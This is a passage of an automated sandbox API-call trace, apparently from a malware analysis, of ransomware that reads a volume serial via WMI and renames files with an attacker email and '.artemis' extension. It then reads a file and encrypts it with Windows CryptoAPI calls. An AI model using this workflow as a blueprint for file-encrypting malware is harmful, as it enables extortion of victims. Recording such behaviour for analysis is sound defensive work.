[3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce56c | out: ppvObject=0x6bce56c*=0x0) returned 0x80004002 [0152.363] WbemLocator:IUnknown:AddRef (This=0x780de4) returned 0x3 [0152.363] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce0ac | out: ppvObject=0x6bce0ac*=0x0) returned 0x80004002 [0152.935] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce05c | out: ppvObject=0x6bce05c*=0x0) returned 0x80004002 [0152.943] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce068 | out: ppvObject=0x6bce068*=0x780d44) returned 0x0 [0152.943] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780d44, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bce070 | out: pCid=0x6bce070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0152.943] WbemLocator:IUnknown:Release (This=0x780d44) returned 0x3 [0152.943] CoGetContextToken (in: pToken=0x6bce0c8 | out: pToken=0x6bce0c8) returned 0x0 [0152.943] CoGetContextToken (in: pToken=0x6bce4d0 | out: pToken=0x6bce4d0) returned 0x0 [0152.943] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce560 | out: ppvObject=0x6bce560*=0x780dcc) returned 0x0 [0152.943] WbemLocator:IRpcOptions:Query (in: This=0x780dcc, pPrx=0x780de4, dwProperty=2, pdwValue=0x6bce588 | out: pdwValue=0x6bce588) returned 0x80004002 [0152.943] WbemLocator:IUnknown:Release (This=0x780dcc) returned 0x3 [0152.943] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x2 [0152.943] CoGetContextToken (in: pToken=0x6bceaa8 | out: pToken=0x6bceaa8) returned 0x0 [0152.943] CoGetContextToken (in: pToken=0x6bcea08 | out: pToken=0x6bcea08) returned 0x0 [0152.943] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x6bcead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6bcead4 | out: ppvObject=0x6bcead4*=0x6742f74) returned 0x0 [0152.943] WbemLocator:IUnknown:AddRef (This=0x6742f74) returned 0x4 [0152.943] WbemLocator:IUnknown:Release (This=0x6742f74) returned 0x3 [0152.943] WbemLocator:IUnknown:Release (This=0x6742f74) returned 0x2 [0152.943] SysStringLen (param_1=0x0) returned 0x0 [0152.943] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737e40, puCount=0x6bcee6c | out: puCount=0x6bcee6c*=0x0) returned 0x0 [0152.944] WbemDefPath:IWbemPath:GetText (in: This=0x6737e40, lFlags=2, puBuffLength=0x6bcee68*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee68*=0x20, pszText=0x0) returned 0x0 [0152.944] WbemDefPath:IWbemPath:GetText (in: This=0x6737e40, lFlags=2, puBuffLength=0x6bcee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.944] CoGetContextToken (in: pToken=0x6bcead8 | out: pToken=0x6bcead8) returned 0x0 [0152.944] WbemLocator:IUnknown:AddRef (This=0x780de4) returned 0x3 [0152.944] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce96c | out: ppvObject=0x6bce96c*=0x780de4) returned 0x0 [0152.944] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x3 [0152.944] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x2 [0152.944] WbemDefPath:IWbemPath:GetText (in: This=0x6737e40, lFlags=2, puBuffLength=0x6bcee70*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee70*=0x20, pszText=0x0) returned 0x0 [0152.944] WbemDefPath:IWbemPath:GetText (in: This=0x6737e40, lFlags=2, puBuffLength=0x6bcee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.944] IWbemServices:GetObject (in: This=0x6742f74, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6bcee24*=0x0, ppCallResult=0x0 | out: ppObject=0x6bcee24*=0x673bac8, ppCallResult=0x0) returned 0x0 [0154.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737dd0, puCount=0x6bcee24 | out: puCount=0x6bcee24*=0x2) returned 0x0 [0154.662] WbemDefPath:IWbemPath:GetText (in: This=0x6737dd0, lFlags=4, puBuffLength=0x6bcee20*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee20*=0xf, pszText=0x0) returned 0x0 [0154.662] WbemDefPath:IWbemPath:GetText (in: This=0x6737dd0, lFlags=4, puBuffLength=0x6bcee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.662] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344c55c*=0, plFlavor=0x344c560*=0 | out: pVal=0x6bcee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344c55c*=8, plFlavor=0x344c560*=0) returned 0x0 [0154.662] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.662] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.663] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6bcee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344c55c*=8, plFlavor=0x344c560*=0 | out: pVal=0x6bcee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344c55c*=8, plFlavor=0x344c560*=0) returned 0x0 [0154.663] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.663] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bcea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0154.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6bcea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x52 [0154.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee88) returned 1 [0154.663] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe" (normalized: "c:\\program files\\common files\\alftp.exe"), fInfoLevelId=0x0, lpFileInformation=0x6bcef04 | out: lpFileInformation=0x6bcef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e0a00, ftCreationTime.dwHighDateTime=0x1d5caa0, ftLastAccessTime.dwLowDateTime=0xa9be8500, ftLastAccessTime.dwHighDateTime=0x1d5a644, ftLastWriteTime.dwLowDateTime=0xa9be8500, ftLastWriteTime.dwHighDateTime=0x1d5a644, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0154.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee84) returned 1 [0154.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\alftp.exe" (normalized: "c:\\program files\\common files\\alftp.exe"), lpNewFileName="C:\\Program Files\\Common Files\\alftp.exe.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files\\common files\\alftp.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0154.664] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe", nBufferLength=0x105, lpBuffer=0x6bceacc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe", lpFilePart=0x0) returned 0x29 [0154.664] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe", nBufferLength=0x105, lpBuffer=0x6bceac4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe", lpFilePart=0x0) returned 0x29 [0154.664] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6bceacc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0154.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcef2c) returned 1 [0154.664] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6bcefa8 | out: lpFileInformation=0x6bcefa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c9c3c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x4c9c3c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x4c9c3c0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0154.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcef28) returned 1 [0154.664] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe", nBufferLength=0x105, lpBuffer=0x6bcea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe", lpFilePart=0x0) returned 0x29 [0154.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bceef4) returned 1 [0154.664] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), fInfoLevelId=0x0, lpFileInformation=0x344cc48 | out: lpFileInformation=0x344cc48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a527150, ftCreationTime.dwHighDateTime=0x1d5949c, ftLastAccessTime.dwLowDateTime=0x8e158290, ftLastAccessTime.dwHighDateTime=0x1d56f0d, ftLastWriteTime.dwLowDateTime=0x8e158290, ftLastWriteTime.dwHighDateTime=0x1d56f0d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0154.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bceef0) returned 1 [0154.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe", nBufferLength=0x105, lpBuffer=0x6bce934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe", lpFilePart=0x0) returned 0x29 [0154.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee28) returned 1 [0154.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x584 [0154.665] GetFileType (hFile=0x584) returned 0x1 [0154.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcee24) returned 1 [0154.665] GetFileType (hFile=0x584) returned 0x1 [0154.665] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x6bcef30 | out: lpFileSizeHigh=0x6bcef30*=0x0) returned 0x13a00 [0155.859] ReadFile (in: hFile=0x584, lpBuffer=0x36cc0f8, nNumberOfBytesToRead=0x13a00, lpNumberOfBytesRead=0x6bceedc, lpOverlapped=0x0 | out: lpBuffer=0x36cc0f8*, lpNumberOfBytesRead=0x6bceedc*=0x13a00, lpOverlapped=0x0) returned 1 [0155.861] CloseHandle (hObject=0x584) returned 1 [0155.861] CryptAcquireContextW (in: phProv=0x6bcee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6bcee7c*=0x7a8870) returned 1 [0155.862] CryptGenRandom (in: hProv=0x7a8870, dwLen=0x10, pbBuffer=0x3749344 | out: pbBuffer=0x3749344) returned 1 [0156.511] SleepEx (dwMilliseconds=0x2, bAlertable=0) returned 0x0 [0158.785] CryptImportKey (in: hProv=0x7a8870, pbData=0x3595118, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6bcee4c | out: phKey=0x6bcee4c*=0x77b330) returned 1 [0158.785] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.785] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.785] CryptDuplicateKey (in: hKey=0x77b330, pdwReserved=0x0, dwFlags=0x0, phKey=0x6bcee3c | out: phKey=0x6bcee3c*=0x77b130) returned 1 [0158.785] CryptContextAddRef (hProv=0x7a8870, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.785] CryptSetKeyParam (hKey=0x77b130, dwParam=0x4, pbData=0x35951f8*=0x1, dwFlags=0x0) returned 1 [0158.785] CryptSetKeyParam (hKey=0x77b130, dwParam=0x1, pbData=0x35951c4, dwFlags=0x0) returned 1 [0158.785] CryptEncrypt (in: hKey=0x77b130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3595208*, pdwDataLen=0x6bceea8*=0x13a10, dwBufLen=0x13a10 | out: pbData=0x3595208*, pdwDataLen=0x6bceea8*=0x13a10) returned 1 [0158.786] CryptEncrypt (in: hKey=0x77b130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35a8c3c*, pdwDataLen=0x6bceeb0*=0x0, dwBufLen=0x10 | out: pbData=0x35a8c3c*, pdwDataLen=0x6bceeb0*=0x10) returned 1 [0158.788] SleepEx (dwMilliseconds=0x2, bAlertable=0) returned 0x0 [0161.072] CryptDestroyKey (hKey=0x77b330) returned 1 [0161.072] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0161.072] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0161.072] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\omnipos.exe", nBufferLength=0x105, lpBuffer=0x6bce920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\omnipos.exe", lpFilePart=0x0) returned 0x29 [0161.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee14) returned 1 [0161.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0161.074] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcdc50) returned 1 [0161.074] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0161.074] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0161.074] CoTaskMemFree (pv=0x7b3f80) [0161.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0161.074] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcee50 | out: ppv=0x6bcee50*=0x72015c) returned 0x0 [0161.074] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcee48 | out: pAptType=0x6bcee48*=1) returned 0x0 [0161.074] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcee4c | out: ppvObject=0x6bcee4c*=0x0) returned 0x80004002 [0161.074] IUnknown:Release (This=0x72015c) returned 0x1 [0161.075] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce7b8 | out: ppv=0x6bce7b8*=0x6737088) returned 0x0 [0161.075] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce9d0 | out: ppvObject=0x6bce9d0*=0x0) returned 0x80004002 [0161.075] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737088, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce9e4 | out: ppvObject=0x6bce9e4*=0x6738620) returned 0x0 [0161.075] WbemDefPath:IUnknown:Release (This=0x6737088) returned 0x0 [0161.075] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce604 | out: ppvObject=0x6bce604*=0x6738620) returned 0x0 [0161.075] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce5c0 | out: ppvObject=0x6bce5c0*=0x0) returned 0x80004002 [0161.076] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0161.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcdf1c | out: ppvObject=0x6bcdf1c*=0x0) returned 0x80004002 [0161.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdecc | out: ppvObject=0x6bcdecc*=0x0) returned 0x80004002 [0161.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcded8 | out: ppvObject=0x6bcded8*=0x77c108) returned 0x0 [0161.076] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c108, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdee0 | out: pCid=0x6bcdee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.076] WbemDefPath:IUnknown:Release (This=0x77c108) returned 0x3 [0161.076] CoGetContextToken (in: pToken=0x6bcdf38 | out: pToken=0x6bcdf38) returned 0x0 [0161.076] CoGetContextToken (in: pToken=0x6bce340 | out: pToken=0x6bce340) returned 0x0 [0161.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce3d0 | out: ppvObject=0x6bce3d0*=0x0) returned 0x80004002 [0161.076] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0161.076] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0161.076] CoGetContextToken (in: pToken=0x6bcecc8 | out: pToken=0x6bcecc8) returned 0x0 [0161.076] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0161.076] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738620, riid=0x6bcecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x6738620) returned 0x0 [0161.076] WbemDefPath:IUnknown:AddRef (This=0x6738620) returned 0x3 [0161.076] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x2 [0161.076] WbemDefPath:IWbemPath:SetText (This=0x6738620, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.076] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bcee7c | out: puCount=0x6bcee7c*=0x0) returned 0x0 [0161.076] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=2, puBuffLength=0x6bcee78*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee78*=0x20, pszText=0x0) returned 0x0 [0161.076] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=2, puBuffLength=0x6bcee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738620, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bcee7c | out: puCount=0x6bcee7c*=0x0) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738620, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738620, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x6bcedfc | out: puCount=0x6bcedfc*=0x0) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bcede8 | out: puCount=0x6bcede8*=0x2) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcede4*=0x0, pszText=0x0 | out: puBuffLength=0x6bcede4*=0xf, pszText=0x0) returned 0x0 [0161.077] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.077] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced98 | out: ppv=0x6bced98*=0x72015c) returned 0x0 [0161.077] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced90 | out: pAptType=0x6bced90*=1) returned 0x0 [0161.077] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced94 | out: ppvObject=0x6bced94*=0x0) returned 0x80004002 [0161.077] IUnknown:Release (This=0x72015c) returned 0x1 [0161.078] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce700 | out: ppv=0x6bce700*=0x6736f28) returned 0x0 [0161.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce918 | out: ppvObject=0x6bce918*=0x0) returned 0x80004002 [0161.078] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce92c | out: ppvObject=0x6bce92c*=0x6738460) returned 0x0 [0161.078] WbemDefPath:IUnknown:Release (This=0x6736f28) returned 0x0 [0161.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce54c | out: ppvObject=0x6bce54c*=0x6738460) returned 0x0 [0161.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce508 | out: ppvObject=0x6bce508*=0x0) returned 0x80004002 [0161.078] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0161.078] 